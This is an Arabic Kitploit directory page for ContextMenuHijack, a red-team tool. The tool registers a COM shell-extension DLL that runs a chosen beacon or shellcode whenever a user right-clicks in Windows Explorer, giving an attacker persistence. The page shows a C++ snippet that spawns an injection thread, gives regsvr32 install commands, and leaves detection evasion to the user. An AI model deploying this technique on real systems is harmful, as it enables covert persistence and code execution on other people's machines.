Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ContextMenuHijack — نفّذ حمولة (payload) عند كل نقرة بزر الفأرة الأيمن على ملف/مجلد في قائمة مستكشف الملفات (Explorer) لتحقيق الثبات (persistence). | Kitploit
أدوات/GitHubGitHub/ristbs/contextmenuhijack
آليات الاستمراريةما بعد الاستغلالالفريق الأحمرتطوير الحمولات
GitHubristbs/contextmenuhijack

ContextMenuHijack

نفّذ حمولة (payload) عند كل نقرة بزر الفأرة الأيمن على ملف/مجلد في قائمة مستكشف الملفات (Explorer) لتحقيق الثبات (persistence).

عرض المستودع
17327منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ContextMenuHijack

الفكرة الأصلية التي ألهمتني هي من @NinjaParanoid :

Video

ContextMenuHijack هي تقنية استمرارية بسيطة تستخدم اختطاف COM بناءً على سلوك المستخدم، فعند النقر بزر الماوس الأيمن على ملف/مجلد في مستكشف الملفات لفتح قائمة السياق، يتم تنفيذ الـ beacon الذي حددناه في الوقت نفسه.

root@kitploit:~
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
    DWORD tid = NULL;
    CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);

    if (NULL == pDataObj) {
	if (pidlFolder != NULL) {
	}
        return S_OK;
    }
    return S_OK;
}

الاستخدام

كل ما عليك فعله هو تحميل ملف الحل (.sln) وبناؤه. من المهم معرفة أنك بحاجة إلى صلاحيات المسؤول لاستخدام تقنية الاستمرارية هذه. بعد القيام بكل ذلك، كل ما عليك هو تسجيل ملف DLL في السجل باستخدام regsvr32:

root@kitploit:~
regsvr32 "C:\path\to\ContextMenuHijack.dll"

إذا أردت إلغاء تثبيته، استخدم فقط العلم /u

root@kitploit:~
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

persistence1

  • يمكن اكتشاف هذه التقنية بسهولة من مكدس الخيوط الخاص بـ explorer.exe، والأمر متروك لك لاستخدام أساليب التهرب الخاصة بك

image

الاعتمادات

  • https://github.com/rikka0w0/ExplorerContextMenuTweaker
  • https://learn.microsoft.com/en-us/windows/win32/shell/how-to-implement-the-icontextmenu-interface?redirectedfrom=MSDN
  • https://www.codeproject.com/Articles/441/The-Complete-Idiot-s-Guide-to-Writing-Shell-Extens
تنزيل الأداة